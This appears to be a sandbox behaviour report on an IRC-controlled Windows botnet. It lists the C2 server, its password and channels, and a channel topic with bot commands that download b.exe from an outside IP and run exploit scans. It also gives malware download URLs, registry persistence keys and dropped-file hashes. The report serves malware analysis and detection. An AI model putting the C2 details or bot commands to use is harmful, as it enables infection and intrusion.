This one is special because u have to make some modifications on your irc client to join the server
ms4all.twoplayers.net
DNS_TYPE_A
204.45.85.218
109.196.130.50
109.196.130.66
204.45.85.210
204.45.85.218:57221
PASS laorosr
Channel#dpi
Channel#!
Now talking in #!
Topic is ‘.asc -S|.http http://208.53.183.101/b.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’
Set by Boss44 on Sun Aug 22 05:45:46
Process Created
C:WINDOWScfdrive32.exe
here same botnet diferent port:
DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.8.2
ms4all.twoplayers.net 109.196.130.50
www.nippon.to
www.nippon.to 112.78.112.208
www.cooleasy.com
www.cooleasy.com 218.5.74.190
obsoletegod.com
Download URLs
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://218.5.74.190/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.5.74.190/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.5.74.190/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
Outgoing connection to remote server: ms4all.twoplayers.net port 47221
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.cooleasy.com TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80
Remote Host Port Number
109.196.130.50 47221
112.78.112.208 80
208.53.183.124 80
208.53.183.222 80
208.53.183.92 80
218.5.74.190 80
74.63.78.27 80
91.212.127.147 80
48.59.85ae.static.theplanet.com 25
209.85.97.106 25
65.55.92.136 25
70.87.6.99 25
MODE #! -ix
MODE #Ma -ix
USER SP2-917 * 0 :COMPUTERNAME
MODE [N00_USA_XP_3823888]
@ -ix
MODE #dpi -ix
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://208.53.183.124/rr.exe
o http://208.53.183.222/click.exe
o http://208.53.183.92/usa.exe
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://74.63.78.27/block.exe
o http://91.212.127.147/spm/s_get_host.php?ver=522
o http://91.212.127.147/spm/s_alive.php?id=52290167395777249625578240136849&tick=114218&ver=522&smtp=ok&sl=1&fw=0&pn=0&psr=0
o http://91.212.127.147/spm/s_task.php?id=52290167395777249625578240136849
Other details
* The following ports were open in the system:
Port Protocol Process
1060 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
1062 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
1065 TCP msvmiode.exe (%System%msvmiode.exe)
2088 TCP msvmiode.exe (%System%msvmiode.exe)
2872 TCP msvmiode.exe (%System%msvmiode.exe)
2873 TCP msvmiode.exe (%System%msvmiode.exe)
2874 TCP msvmiode.exe (%System%msvmiode.exe)
2876 TCP msvmiode.exe (%System%msvmiode.exe)
2877 TCP msvmiode.exe (%System%msvmiode.exe)
2879 TCP msvmiode.exe (%System%msvmiode.exe)
2880 TCP msvmiode.exe (%System%msvmiode.exe)
2881 TCP msvmiode.exe (%System%msvmiode.exe)
2883 TCP msvmiode.exe (%System%msvmiode.exe)
2884 TCP msvmiode.exe (%System%msvmiode.exe)
2887 TCP msvmiode.exe (%System%msvmiode.exe)
2888 TCP msvmiode.exe (%System%msvmiode.exe)
2889 TCP msvmiode.exe (%System%msvmiode.exe)
2891 TCP msvmiode.exe (%System%msvmiode.exe)
2892 TCP msvmiode.exe (%System%msvmiode.exe)
2893 TCP msvmiode.exe (%System%msvmiode.exe)
2894 TCP msvmiode.exe (%System%msvmiode.exe)
2895 TCP msvmiode.exe (%System%msvmiode.exe)
2898 TCP msvmiode.exe (%System%msvmiode.exe)
2899 TCP msvmiode.exe (%System%msvmiode.exe)
2901 TCP msvmiode.exe (%System%msvmiode.exe)
2902 TCP msvmiode.exe (%System%msvmiode.exe)
2903 TCP msvmiode.exe (%System%msvmiode.exe)
2905 TCP msvmiode.exe (%System%msvmiode.exe)
2906 TCP msvmiode.exe (%System%msvmiode.exe)
2907 TCP msvmiode.exe (%System%msvmiode.exe)
2908 TCP msvmiode.exe (%System%msvmiode.exe)
2910 TCP msvmiode.exe (%System%msvmiode.exe)
2911 TCP msvmiode.exe (%System%msvmiode.exe)
2912 TCP msvmiode.exe (%System%msvmiode.exe)
2913 TCP msvmiode.exe (%System%msvmiode.exe)
2926 TCP msvmiode.exe (%System%msvmiode.exe)
2931 TCP msvmiode.exe (%System%msvmiode.exe)
2932 TCP msvmiode.exe (%System%msvmiode.exe)
2933 TCP msvmiode.exe (%System%msvmiode.exe)
2936 TCP msvmiode.exe (%System%msvmiode.exe)
2938 TCP msvmiode.exe (%System%msvmiode.exe)
2939 TCP msvmiode.exe (%System%msvmiode.exe)
2941 TCP msvmiode.exe (%System%msvmiode.exe)
2942 TCP msvmiode.exe (%System%msvmiode.exe)
2944 TCP msvmiode.exe (%System%msvmiode.exe)
2945 TCP msvmiode.exe (%System%msvmiode.exe)
2946 TCP msvmiode.exe (%System%msvmiode.exe)
2947 TCP msvmiode.exe (%System%msvmiode.exe)
2948 TCP msvmiode.exe (%System%msvmiode.exe)
2949 TCP msvmiode.exe (%System%msvmiode.exe)
2950 TCP msvmiode.exe (%System%msvmiode.exe)
2951 TCP msvmiode.exe (%System%msvmiode.exe)
2952 TCP msvmiode.exe (%System%msvmiode.exe)
2954 TCP msvmiode.exe (%System%msvmiode.exe)
2955 TCP msvmiode.exe (%System%msvmiode.exe)
2956 TCP msvmiode.exe (%System%msvmiode.exe)
2958 TCP msvmiode.exe (%System%msvmiode.exe)
2959 TCP msvmiode.exe (%System%msvmiode.exe)
2960 TCP msvmiode.exe (%System%msvmiode.exe)
2962 TCP msvmiode.exe (%System%msvmiode.exe)
2965 TCP msvmiode.exe (%System%msvmiode.exe)
2966 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2967 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2968 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2969 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2970 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2971 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2972 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2973 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2974 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2975 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2976 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2977 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2978 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2979 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2980 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2981 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2982 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2983 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2984 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2985 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2986 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2987 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2988 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2989 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2990 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2991 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2992 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2993 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2994 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2995 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2996 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2997 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2998 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2999 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
3000 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
3001 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
3002 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
3003 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
3004 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ MSODESNV7 = “%System%msvmiode.exe”
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”
+ 24024 = “%System%syscache.exe”
so that msvmiode.exe runs every time Windows starts
so that cfdrive32.exe runs every time Windows starts
so that syscache.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup]
+ ridt100413 = “1”
+ id = “52290167395777249625578240136849”
+ host = “91.212.127.147”
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
+ Taskman = “%AppData%ltzqai.exe”
so that ltzqai.exe runs every time Windows starts
Memory Modifications
* There were new processes created in the system:
Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%cfdrive32.exe 339 968 bytes
msvmiode.exe %System%msvmiode.exe 159 744 bytes
syscache.exe %System%syscache.exe 90 112 bytes
218880.exe %Temp%218880.exe 339 968 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash
1 %AppData%ltzqai.exe
[file and pathname of the sample #1] 81 920 bytes MD5: 0xD9E7F29BDC3360F88F907607EFCF115A
SHA-1: 0x8A47B56FCEDA2D872F6A64A1BDC8C472090EDC81
2 %Temp%166579.exe 2 172 bytes MD5: 0x2BCDE5450540F3B929CC36159C90C7BD
SHA-1: 0x1AEB1CD14AEAFEA9395D7B8C84BDCCE138AE915C
3 %Temp%218880.exe
%Windir%cfdrive32.exe 86 016 bytes MD5: 0x4154F0AD2AA86ABA7543D121EEA5ECA8
SHA-1: 0xD286B43BDDFDAF6C45F0535CFD3F7D7EE4A94242
4 %Temp%22728.exe
%System%msvmiode.exe 176 128 bytes MD5: 0x616C7BCAE12DF9D577EE3973741B3044
SHA-1: 0x0FB88C07A93B53F321A0BD33277EABB09A6DD83C
5 %Temp%24024.exe
%System%syscache.exe 126 976 bytes MD5: 0xEFAA4CAD70DB7D08AA32BA670260A0D5
SHA-1: 0x2E623CED33120C9A8DA76C60C338F9FF493CF1EC
6 %Windir%hosts 267 619 bytes MD5: 0xDB594439DE8B36C39F845D34FB43B41A
SHA-1: 0x0328295CD1DA611F3782E08BD4CA0235B4CE5DAF
7 %System%drivershosts 266 648 bytes MD5: 0x143048AB28E3733F0BDD749CEF208096
SHA-1: 0xF7FAF1D69616DD8220ED9193C4D719C06109BCC5
8 %System%hosts 250 252 bytes MD5: 0x170C57E3702CFE8CE908BE2ACEA3E699
SHA-1: 0x209E8177354DC8F4A47C0CAAC12BA242465AB65D
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Setup” = C:WINDOWScfdrive32.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Microsoft Driver Setup” = C:WINDOWScfdrive32.exe
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
File Changes by all processes
New Files DeviceTcp
DeviceIp
DeviceIp
C:WINDOWScfdrive32.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
%windir%/logfile32.log
Opened Files .Ip
C:WINDOWSRegistrationR000000000007.clb
.PIPElsarpc
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWS
.Ip
%windir%/logfile32.log
.PIPEROUTER
.PIPElsarpc
c:autoexec.bat
Deleted Files
Chronological Order Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:WINDOWScfdrive32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:rr.exe to C:WINDOWScfdrive32.exe
Set File Attributes: C:WINDOWScfdrive32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWS ()
Find File: C:WINDOWScfdrive32.exe
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: %windir%/logfile32.log (OPEN_EXISTING)
Create File: %windir%/logfile32.log
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk